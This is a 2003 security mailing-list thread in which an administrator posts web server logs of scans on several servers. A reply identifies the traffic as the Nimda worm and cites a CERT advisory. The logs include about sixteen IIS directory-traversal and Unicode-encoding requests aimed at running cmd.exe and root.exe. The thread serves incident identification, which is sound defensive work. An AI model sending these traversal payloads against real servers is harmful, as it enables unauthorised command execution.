Looks like plain old Nimda to me. Someone please correct me if I'm missing something obvious. <http://www.cert.org/advisories/CA-2001-26.html> Jason Falciola Security Intelligence Analyst IBM Managed Security Services falciolaat_private Danny <dannyat_private> 07/28/2003 11:24 PM To: incidentsat_private cc: Subject: Anyone know this tool? Does anyone happen to know what tool this is? I've seen the exact same scans on 6 of our servers on completely different networks. All the scans have been from different source IP's and all the servers were hit within a space of a few hours. Curiosity is getting the better of me since i've never seen this exact pattern before :) 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" Danny Work - http://www.eBoundary.com - Secure, FreeBSD hosting. Play - http://www.eBoundary.net - Who really sets your electronic boundaries? AIM: eBoundaryTch | ICQ: 3090141 --------------------------------------------------------------------------- ---------------------------------------------------------------------------- --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:40:45 PDT